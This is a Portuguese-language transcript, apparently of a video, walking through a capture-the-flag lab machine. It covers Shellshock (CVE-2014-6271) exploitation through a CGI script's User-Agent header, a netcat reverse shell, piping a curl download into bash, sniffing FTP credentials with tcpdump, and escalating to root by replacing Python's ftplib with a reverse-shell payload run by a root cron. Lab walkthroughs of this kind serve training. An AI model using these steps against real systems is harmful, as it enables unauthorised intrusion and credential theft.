Fala pessoal, vamos começar a nossa 16ª máquina. A gente chegou aí na metade do desafio. A máquina que a gente vai fazer hoje é a Symfony 3, né? A gente fez a 2 ontem. Para subir essa máquina foi bem tranquilo, foi só subir o VMDK lá dentro do VirtualBox como disco, né, de uma máquina Debian e funcionou tranquilo. Essa máquina aqui, a gente vai explorar um cara que chama CGI. O CGI é o Common Gateway Interface. É um mecanismo ali dentro do web server, né, que permite que uma aplicação web utilize scripts e rode comandos, né, dentro do servidor. Então, é utilizado aí para fazer uma interface entre o que está lá no front-end e algo que precisa ser rodado, né, em uma linguagem que não seja uma linguagem web, por exemplo, né? Então, você pode usar o CGI, por exemplo, para executar um comando em C, em outra linguagem mais baixo nível, né? Não é muito utilizado hoje o CGI. E em 2014, deixa eu ver se foi 14, 2014, mais ou menos em setembro, né, aqui ó, em setembro de 2014, rolou uma falha no bash do Linux, que é a CVE 2014 6271, que as versões entre 1.14 até 4.3 do bash possui uma falha aqui de implementação que permite, né, um bug aqui que permite que seja executado comandos remotamente, utilizando variáveis de ambiente dentro do bash. Então aí para corrigir o problema o pessoal tinha que atualizar aí a versão do bash, né? Então aqui nos links de descrição tá na descrição os links aqui de apoio, então vocês conseguem ver sobre como funciona, né, o ataque aqui do Shell Shock, né, como que é feito essas injeções de comando lá dentro do server para vocês poderem dar uma estudada em relação a isso. Então, o que a gente vai explorar nessa máquina é o Shell Shock para conseguir abrir a nossa primeira sessão. Depois que a gente abre a primeira sessão e consegue o primeiro usuário dessa máquina, a gente vai vai navegar por ela, né, e vai acabar encontrando que tá rodando um FTP dentro dessa máquina aí, né, como localhost. E nesse FTP ele vai estar trafegando alguns outros usuários. A gente não, para a gente escalonar privilégio, a gente vai ter que conseguir outros usuários. Então, a gente vai utilizar uma ferramenta chamada PSPy aqui, ó, que essa ferramenta ela serve para, entre aspas, espiar, né, processos de outros usuários. Então, ele consegue mostrar o que está rodando como processo em outros usuários. A gente consegue ver então o que tá rodando, né? E dessa forma a gente consegue ver que tem um script rodando chamando um FTP em Python, e esse script ele utiliza, né, uma lib de Python, que é uma lib para FTP, né? Vai estar aqui na descrição também o link da lib. Só que durante esse recon a gente percebe nessa máquina que a gente consegue escrever dentro do diretório do Python, onde ficam as libs do Python. A gente não tem permissão para escrever no script, então a gente vai fazer uma artimanha aqui de editar o código-fonte dessa lib para no momento que um cron executa ela dentro do server lá, ele chame essa lib e a lib que a gente modificou vai fazer com que abra uma sessão como root, então aí com a nossa máquina, né? A gente vai utilizar tcpdump também aqui para conseguir interceptar a credencial desse FTP, porque ela passa em texto plano, né, no FTP, não é igual o SFTP que passa cifrado. Então, na hora que a gente faz a análise de tráfego ali, a gente consegue interceptar o usuário se logando e a gente vai pegar a senha em texto plano. E é isso aí. Então, vamos na prática aqui. A primeira coisa que a gente precisa fazer é escanear o server aqui, como sempre, né? Nmap, "-szinho vzão, "-v, 192.68.2.34. Foi o IP que ela pegou aqui na minha infra. A gente já viu aqui que está rodando, né, um ProFTPD aqui, 135. Está rodando um OpenSSH 74, né, e um Apache aqui um HTTPD 2425. Se a gente abrir esse cara no browser, né, a primeira coisa que a gente vê aqui é só uma tela como a Symfony anterior, né? 34, não tem nada de demais aqui.
Mas se a gente fizer uma enumeração nela aqui, opa, maiúsculo, dirb http 192.168.2.34 menos d para passar word lists barra usr share word lists dirb barra big. A gente pode deixar ele rodando aqui, ó. Ele já encontrou o diretório barra cgi barra bin aqui, ó, e outros diretórios, o diretório gate e tal. Então a gente pode enumerar o CGI bin para ver se a gente encontra alguma coisa. Vamos passar como parâmetro aqui, ó, barra CGI bin para ele enumerar dentro desse diretório. Então agora ele vai procurar aqui dentro. A gente não encontrou nada, né, no CGI bin ali. Se a gente vier aqui no browser, então abrir aqui o 92.168.2.34, a gente der um view source aqui, ó. Ele perguntou aqui, né, se a gente can you bust the underworld? Então pode ser que tenha algum diretório com esse nome, né? Então se a gente tentar chamar aqui barra underworld, não foi, né? Então vou tentar aqui dentro do CGI. Se você tentar, né, dentro de outros diretórios aqui, vou chamar o CGI bin. Bin barra underworld. A gente conseguiu descobrir que tem um script rodando, né, que chama underworld, que ele utiliza o CGI bin. Então, se essa palavra underworld estivesse na nossa word list, né, a gente ia conseguir enumerar aqui. Então, você poderia colocar ela como word list lá dentro do dirb, que ia acabar chegando aqui no CGI barra bin barra underworld. A gente pode, aqui no caso, foi testando manualmente, né, até chegar aqui. É só em CTF que você vai ter dica assim, né? Na vida real não, mas é claro que na vida real também não ia estar escondido esse cara aqui, não, talvez não chamasse dessa forma, sei lá, você ia acabar conseguindo encontrar isso de algum jeito aí, né, na vida real. Então agora que a gente achou o endereço aqui do nosso CGI barra bin, CGI-bin aqui, a gente pode fazer o teste do Shell Shock. Tem aqui alguns links, né, esse link aqui da Cloudflare, ele está mostrando como que alguns caras exploram o exploram o Shell Shock para fazer algumas ações, né? Para mandar e-mail, para se conectar na máquina, para fazer um monte de coisa. Dei uma olhada depois para vocês verem aí as funcionalidades que os malwares utilizam aí dentro desse cara. Até para fazer ataque de DDoS, os caras fazem aqui, ó, uma requisição, né? Mandando um ping "-c1" aqui com o destino para o alvo deles e faz um script varrendo a internet para utilizar o Shell Shock para fazer o ataque, né? Mas o que importa para a gente aqui, né, é conseguir fazer o teste e validar se está conseguindo inserir comandos lá dentro do server ou não. Nesse link aqui da 7layers, ó, ele tem umas explicações sobre como utilizar o Shell Shock, né, e ele passa aqui para você testar. Esse aqui é o parâmetro para você testar em localhost, mas se você quiser testar remotamente, ó, dentro do user agent, depois ao invés de colocar o user agent, né, normal do browser, ele passa aqui o parâmetro de exploração do Shell Shock aqui, né, que isso aqui é tratado como uma variável e ele executa lá no server. Então, na sequência, ele concatena aqui com outros comandos, olha, ele dá dois ecos aqui para poder mostrar o próximo comando. E então ele manda aqui, né, utiliza o cat, passa o caminho inteiro do binário aqui do cat para abrir o PSWD, né, e ele então acaba mostrando isso pra gente dentro do. Aqui é o diretório onde está o CGI, né? E acaba mostrando isso pra gente aqui na tela. Então a gente vai tentar fazer o mesmo, ó, você dá um seu URL. Então aqui ó, o próximo parâmetro que ele passou aqui foi o "-h", o "-h" maiúsculo é para passar o header da requisição. Então você pode aqui dentro do header passar o user agent e dentro do user agent você passa então o parâmetro ali do Shell Shock, né? Que é o abre e fecha parênteses, abre colchetes,
ponto e vírgula, dois pontos, ponto e vírgula, né? Fecha colchetes. É uma estrutura como se fosse um script, né? Onde você passa uma função aqui, abre aqui teria um parâmetro da função, então ele entra dentro da função, né? Que tem, executa alguma coisa e sai da função. Depois que a gente passar esse parâmetrozinho aqui para fazer a exploração do shell shock, aí a gente pode tentar exibir alguma coisa. Então, você pode colocar aqui vamos tentar, sei lá, dar um name "-a", passar o barra bin barra bash. Daí a gente passa o parâmetro "-c" para passar a linha de comando do que a gente quer que execute, né? E dentro do comando a gente pode dar, sei lá, um name "-a", por exemplo. E aí depois fecha aqui o parâmetro do header, né, do "-h", e a gente passa então o endereço do alvo, http //192.168.2.34/cgi-bin qual que é o diretório que a gente pegou do CGI bin aqui mesmo? É o underworld. Então, ó, ele deu um erro na requisição. Só que ele deu um erro 500, ó, ou seja, ele executou lá no server, só que deu um erro de sintaxe e crashou. Então você pode continuar fazendo o seu teste aqui. Provavelmente é por conta de como está feito o script lá. Então se você der um echo aqui, ó, para ele mostrar algo em branco primeiro para depois executar, aí você já consegue trazer aqui então o name-a. Porque executando direto aqui o bash, ele crashou a saída lá, então deu um internal server error. O resultado foi 500, né, que o servidor retornou. Então se você der um echo em branco aqui, primeiro ele vai executar o echo e aí, na sequência executar o nosso comando. Então dessa forma a gente conseguiu aqui receber o name-a de lá de dentro do server, ó. Então, vamos tentar mandar um ID aqui, por exemplo, para ele dizer para a gente qual que é o usuário que está rodando lá nessa aplicação. Ó, é o usuário Cerberus, ó. Então, agora que a gente viu que a gente consegue executar comandos lá no server, a gente pode abrir aqui um outro terminal, né? E iniciar o nosso handler. Mas antes de iniciar o handler, a gente pode executar direto o netcat lá ou utilizar o mkfifo, né? Fazer outros tipos de shell. Aqui a gente vai rodar direto o netcat lá no alvo. Então primeiro vamos abrir o handler aqui, sudo nc -nlvp na 443, como sempre, né? Opa, nlvp para escutar no modo verboso na 443. E está escutando aqui. Então agora aqui na nossa requisição, ó, ao invés de passar o ID aqui, a gente vai passar um NC 192.168.2.5, que é o IP do meu Kali, na 443, "-e para executar o "-bin "-bash". Então a gente conseguiu a conexão aqui com o server, ó. Já posso fechar esse cara aqui. Ó, a gente já conseguiu então a primeira shell lá no server. Vamos spawnar aqui o tty "-c de linha de comando, import pty.spawn /bin /bash. Então beleza, a gente conseguiu a nossa primeira shell interativa aqui. Então agora que a gente tem o acesso aqui do server, né, a gente pode começar a enumerar aqui dentro. Se der um ps-out aqui, você vai ver vários serviços rodando aqui, mas ele só mostra, né, os serviços que estão rodando aqui com o usuário Cerberus. A gente pode rodar aqui a gente pode rodar o linha-enum aqui para a gente poder ver mais informações sobre esse usuário. Deixa eu abrir uma nova tab aqui. Aqui dentro do A, esse arquivo A é o meu linha-enum, tá? Que eu salvei aqui na máquina de ontem. Então a gente pode subir o Simple Server aqui. Usem simple http server na 1.8080. E aqui a gente pode dar um CURL "-s de silent http 192.168.2.5, que é o IP do Kali, na 8080 /a pipe bash para ele executar
né, no bash a requisição que ele vai fazer do A lá. Então já iniciou nosso linha num aqui, já começa a ver aqui as informações, né, sobre o nosso alvo. Legal, já mostra algumas coisinhas aqui. Aberta 21 a 22, né? Rodando a 25 local ali. Já trouxe alguns processos a mais do que só o PS-A, acho que a gente rodou ali. Ó, legal que a gente sabe que está rodando aqui com Python 3 ou um file to ban server, então alguma coisa aqui está rodando um file to ban. Legal. A gente não vai conseguir ver muita coisa, né, dentro aqui desses processos, porque esse usuário ele não tem muitos privilégios, né? Mas a gente viu que tem um FTP rodando nessa máquina. Então, se a gente startar aqui uma análise de tráfego, né, e começar a escutar o que está trafegando aqui, a gente vai começar a ver algumas informações interessantes, porque o FTP a gente sabe que ele trafega sem cifra, né? Então a senha, o usuário e senha que passar, que se conectar nesse FTP, a gente vai conseguir interceptar aqui. A gente pode utilizar o TCP-dump, a documentação tá aqui na descrição também. E aqui no TCP-dump, a gente vai conseguir interceptar pacotes. Então, né, o TCP-dump ele é igual ao Wireshark, né? Faz a interceptação dos pacotes ali. Só que ele roda aqui no terminal do Linux, né? Ele é tão robusto quanto. Acho que até mais do que o Wireshark, mas aí vai de gosto. Tem gente que gosta de analisar tráfego direto no Linux aqui pelo TCP-dump, tem gente que gosta de usar o Wireshark, né? Então você pode passar o "-v" de modo verboso aqui, e o "-i" para passar a interface. Você pode colocar LO de loopback, ele vai pegar a interface default aí que está rodando aqui dentro do nosso alvo. E a porta, você passa um port para passar qual porta que a gente quer rodar, e a gente vai ver na porta 21, que a gente quer escutar só a porta do FTP, que se você não passar a porta, ele vai começar a escutar tudo que está vindo para cá, né? Então se a gente deixar aqui escutando o TCP dump, em alguns minutinhos aqui a gente vai conseguir ver algum tipo de conexão. Então imagine aí que se você tivesse na vida real, né, já tivesse comprometido o alvo, você poderia escutar o tráfego aí para poder ver se você pega alguma coisa passando sem cifra, por exemplo, né? Então é bem comum você fazer isso num ataque de verdade também, você escutar o tráfego para ver o que está passando, porque às vezes você não vai sair rodando scan que nem louco, né, por conta de, sei lá, pode ter um CIEM lá pegando um flow de rede, por exemplo, que vai te pegar na mesma hora que você começar a disparar scan. Se você fizer isso passivamente, escutando o tráfego, você vai acabar conhecendo o que está passando aí na rede. Olha, ele já começou a escutar aqui, ó. Então a gente já consegue ver que foi feita uma requisição do usuário Hards aqui, ó, e passou a senha dele aqui, ó. Então o user Hards se logou dentro do FTP e a senha dele é essa aqui. Então agora que a gente sabe a senha do usuário Hards aqui, né, a gente consegue se logar com ele. Lembra que tem um SSH nessa máquina? Então a gente pode vir aqui numa outra janela aqui e se conectar aqui SSH ADS arroba 192.68.2.34 e a senha é aquela senha, essa senha aqui que a gente copiou, ó, do usuário ADS. Então dessa forma a gente conseguiu aqui o nosso segundo acesso da máquina, né, com o usuário ADS. Então a gente fez análise de tráfego aqui para conseguir escutar a hora que ele se conectasse. E assim que ele se conectou, a gente conseguiu pegar aqui, né? Se você pegar todos os pacotes aqui para entender, foi uma requisição que ele fez para o FTPD aqui, ó. Ele se conectou tentou se conectar no Pro FTPD. Então ele passou o usuário ADS, depois ele passou o FTP respondeu para ele que ele precisa passar a senha, então ele passou a senha. Aí depois o FTP retornou para ele um 230 aqui, ó, que ele foi logado. Então ele deu um CWD aqui no barra SRV barra FTP. Aí o server respondeu sucesso para ele aqui dessa requisição, né? Então assim a gente pode parar de escutar aqui, já que já foi o suficiente para vocês entenderem como é que funciona a análise de tráfego, né? A gente conseguiu ver toda a comunicação então do usuário ADS se conectando lá no FTP. Agora que a gente está aqui dentro do usuário ADS,
a gente consegue fazer os próximos movimentos aí para escalonar o privilégio aqui dentro desse cara, né? Então, aqui nesse usuário a gente pode fazer, né, a busca aí por arquivos, né, que a gente consegue escrever. Tipo, a gente pode utilizar o find, né, no barra para buscar todos os arquivos dentro do barra. O menos permit são arquivos que a gente vai ter permissão, arquivos que tenha permissão, né, de que estejam no grupo de root. A gente pode passar o menos type aqui para dizer o tipo do arquivo. E a gente pode colocar um F aqui de file, né, para passar arquivos que a gente tenha permissão de escrita como root. O comando 2 aqui é para passar o erro, para pegar o standard error, né, e jogar ele para dev null aqui, ó, para poder mostrar a saída limpa. A gente vê que não tem nenhuma ferramenta aqui que a gente consiga utilizar como root para escalonar o privilégio aqui, né? Deixa eu dar um ps-x aqui para ver o que está rodando. Ó, esse cara tá rodando o file2ban aqui com o Python, tá legal. É, vai chegar um momento aqui que você vai estressar já muita coisa de o que pesquisar nessa máquina aqui, né? Então a gente pode fazer aquele esquema de espiar aí os processos de outros usuários. Aqui lembra que a gente falou sobre o PSPy aqui, ó, que é a ferramenta que permite você ver processos rodando com outros usuários, né? Agora que a gente rodar ele aqui, vocês vão conseguir entender melhor sobre o funcionamento aqui do PSPy. Para rodar esse cara aqui, ele foi programado em Go, então você precisa compilar a ferramenta para poder executar ela aqui dentro do server. Então como é que a gente vai fazer isso, né? Você precisa primeiro baixar ele aqui, você precisa ter o Go instalado no teu Kali aí, né? Então você pode, deixa eu dar um mkdir aqui para criar uma pastinha, mkdir pspy cd pspy1, beleza? Então você pode dar um git clone aqui para ele clonar o repositório lá do Git, né? E a gente conseguir então compilar esse cara aqui. Ó, se entrar aqui no PSPy, ele tem aqui todos os arquivos necessários para compilar a ferramenta, né? Que ela vai compilar aqui dentro do diretório. Então, depois você pode dar uma lida sobre Go ali, como funciona. Mas a gente pode dar um Go build aqui. Opa, ele não encontrou aqui o patch do CMD. Esse aqui é CMD. Aqui nessa URL ele mostra aqui como instalar o PSPy, né? Como compilar o PSPy. Se a gente tentar dar um Go build que nem a gente fez ali e não rolar, né? Ele te fala que precisa instalar o Golang aqui. Se você não tiver o Go dentro aí do seu sistema, né? Mas ele disse aqui que se você não conseguir instalar como a gente fez aqui agora, não conseguir compilar ele, você pode dar um go get GitHub aqui direto no CMD aqui, ó, no PSPy CMD lá dentro do repositório do GitHub. Então, vamos lá, go get pspy cmd. Não conseguiu importar não. Deixa eu tentar aqui fora, que aqui está funcionando o Go. Tem que arrumar o Golang ali dentro do Kali. Mas se eu der um Go build aqui nesse diretório tá o PSPy da mesma forma que ali, fiz o download, né? Go build. Olha, vai demorar um pouquinho para compilar. Então ele compilou aqui, ó, o PSPy. Então a gente precisa jogar esse PSPy lá para dentro do server de alguma forma, né? Então, como a gente tem aí a senha já desse usuário, a gente pode jogar via SCP, né, para dentro do server. O SCP ele utiliza o SSH para fazer a cópia de um arquivo. Então, a sintaxe vai ser SCP
o nome do arquivo, o usuário, que o usuário que a gente pegou aqui foi o Ades, arroba 192.68.2.34. Aí a sintaxe aqui é dois pontos e o diretório dentro do server onde você vai jogar esse cara. Então, para ter certeza que dá para escrever, eu vou jogar no barra tmp. Ele vai pedir a senha aqui do usuário. A gente pode pegar a senha aqui que a gente capturou, né? Deixa eu voltar aqui. Então ele, ó, ele já fez a cópia lá para dentro do server. Então aqui no nosso SSH que está aberto aqui. Opa, deixa eu fechar esse aqui, é meu Kali. cd barra tmp. Tá aqui então o PSPy, né? Então a gente pode executar ele. E o PSPy, ó, se você deixar ele escutando aqui, ó, ele vai ver, né, ele vai ver processos que estão rodando dentro de outros usuários e qual foi o comando que foi executado para startar esses processos. Então a gente já começa a conseguir ver algumas coisas a mais aí dentro do server. Então vamos deixar rodando mais um pouco, que talvez ainda não esteja executando algo que a gente quer ver. Então lembrando que numa invasão real, né, assim como a gente precisou ficar esperando alguém se conectar lá dentro do outro server, né, dentro do outro usuário, lá a gente ficou analisando o tráfego esperando alguém se conectar no FTP. Aqui a gente pode ficar esperando para ver que tipo de processo que vai ser startado também. Então aqui a gente já consegue ver que acabou de rodar um cron lá, ó, né? E esse cron ele chamou aqui, ó, barra opt barra ftp client barra status check.txt. Então significa que tem um cron rodando aqui nessa máquina, né? E esse cron, ó, o ID é zero, então significa que quem está rodando esse cron é o root. E ele chamou aqui "-silent", né, "-i", localhost barra opt ftp client. Então a gente está vendo aqui, né, em tempo real os processos que estão sendo executados. E olha que legal, a gente conseguiu ver que o cron do usuário root chamou esse arquivo aqui, ó, barra opt barra ftp client. Então a gente pode parar aqui que a gente já viu um negócio legal. Se a gente for lá em barra opt, cd barra opt, tem aqui uma pasta chamada FTP Client. Então, se a gente for aqui no FTP Client, ó, ele tem um arquivo em Python aqui. A gente dá um ls-lh aqui, ó. A gente está vendo que o dono dele é o root. Então, a gente não vai conseguir escrever nesse cara, né? Se a gente tentar, a gente não vai conseguir. Mas se a gente ler ele aqui, ó, a gente consegue ver que ele está utilizando a biblioteca do ftplib, né, de Python. Então, a gente já pode pesquisar ela para ver como que ela funciona, né? Opa, ftplib. Que é a lib que a gente já até viu aqui dentro do desafio, né? Que fala aí sobre utilização de FTP dentro do Python. Então a gente sabe que esse script aqui, ó, ele tá sendo executado pelo usuário root, né, dentro do cron. Então tem um cron rodando esse cara e está salvando um arquivo chamado status check aqui. Então ele está fazendo um check de status aqui desse FTP. Então a gente não consegue escrever nesse arquivo porque ele o owner dele é o root aqui, né? Mas a gente pode tentar escrever de alguma forma porque olha, ele está importando o ftplib. Então, se a gente conseguir escrever dentro do ftplib, a gente vai conseguir executar um comando como root aqui dentro. Então, se você procurar, aqui der um find, né, barra para procurar dentro da raiz arquivos que sejam writable, menos writable aqui, né? Você pode pôr o menos type para passar o tipo. A gente pode colocar poderia passar um arquivo, né, com menos type f para passar um file, mas a gente vai passar um d de diretório para a gente ver se tem algum diretório que a gente consegue escrever, porque nesse caso a gente quer, o nosso objetivo aqui é escrever dentro do diretório do Python para alterar esse ftplib aqui. Então a gente pode de novo jogar o standard error para barra dev barra null aqui. Então a gente consegue ver aqui, ó, que dentro do srlib Python 2 a gente consegue escrever, né, que a gente procurou arquivos que estão writables para o nosso usuário e a gente percebeu aqui, ó, que a gente consegue escrever dentro do Python 2.7. Então se a gente for aqui, ó, cd usr Python, cd usrlib Python 2.7. Aqui dentro estão todas as libs de Python,
na versão 2.7, né? Então tudo que for, todas as libs do Python que estão nesse sistema aqui estão aqui dentro. Então a gente viu aqui dentro do script do cara, na hora que a gente leu ele aqui, que ele está usando o ftplib. Então ele está importando o ftplib para dentro desse comando aqui. Então o que acontece? Essa biblioteca ftplib ela está aqui dentro do diretório do Python. Quer ver, ó? É, Então aqui eu dei um lsftp asterisco aqui, né? Ó, o ftplib está aqui dentro. Então, deixa eu dar um "-lha" para ver se a gente tem permissão de escrever nela. Ó, ele tá com a gente tem permissão de escrita dentro do ftplib aqui, ó. Então o que a gente pode fazer? A gente pode apagar ele. Você poderia editar ele na mão, mas ele é grande, ó. Se você der um nano nele aqui, tô dando nano porque não tem VI nessa máquina. ftplib. Ó, é um arquivão grandão, tá vendo? Ó, é a biblioteca, né? Então, ao invés de você apagar tudo isso aqui para poder fazer funcionar a shell, você pode apagar o arquivo mesmo, ftplib.py, e criar ele de novo. Então, aqui dentro a gente pode colocar a nossa shell. Vamos lá no Pentest Monkey para a gente pegar aquela shell de Python, né? Que é bem legal de usar ela. Pega desde o import aqui, ó, que a gente vai ter que editar ela aqui dentro do arquivo, porque agora é um arquivo de Python, não uma linha de comando, né? Então a gente vai ter que editar ele aqui para ele funcionar como um script mesmo, né? Então vamos tirar as quebras de linha. Ele está importando o subprocess, o OS e o socket, né? Então ele inicia uma variável s aqui, onde ele está instanciando o socket. Ó, o ponto e vírgula sempre quebra a linha. Então aqui a gente coloca o IP do nosso Kali, né? 92.168.2.5 na 443, como sempre, onde a gente sempre conecta. Ó, quebra-linha a gente sempre pula aqui porque o Python ele funciona com indentação, né? Então se você não indentar direito aqui, ele vai dar erro na execução. Então você pode terminar a edição aqui do script, tirar esse ponto e vírgula aqui do final, né? Que senão ele vai dar erro na execução. Então aqui a gente está criando uma conexão socket para o nosso Kali na 443, executando o Beam Bash, né? Vou dar um Ctrl X para salvar aqui. Então já está salvo. Agora a gente pode vir aqui no nosso Kali e startar o nosso handler de novo. "-nlvp na 443". Então a gente deixa ele escutando aqui, o que vai acontecer? Lembra que a gente viu ali no subprocess, ali nos processos, né, utilizando o PSPy ali, a gente viu que tem um cron rodando como root, chamando aquele arquivo de Python lá que starta o log do FTP para dentro ali do diretório onde o administrador tá lendo os logs, né? Então agora a gente só precisa esperar que o script seja executado de novo, porque a gente envenenou a biblioteca, né, do PyLib lá, a gente apagou ela, ó, a gente acabou de receber a conexão aqui, porque a gente trocou a biblioteca pelo nosso código malicioso lá que faz a conexão via socket. Então quando o script do cara dá o import dentro da biblioteca, ele vai executar a biblioteca, né? Então a gente acabou caindo aqui como root, ó. Opa. Então o script foi executado como root, né, pelo cron, e a hora que ele executou a gente abriu a nossa sessão, porque dentro da biblioteca a gente colocou a nossa requisição, fazendo o envio do Beam Bash, né, via socket pro nosso Kali aqui, no nosso handler. Beleza? Espero que vocês estejam gostando das máquinas aí. Quem não está inscrito no canal ainda, se inscreve aí. Aqui embaixo está na descrição o link de material de apoio para tudo que a gente fez aqui hoje e também está disponível o link para a máquina de amanhã. Beleza? Então, vejo vocês amanhã e falou, pessoal!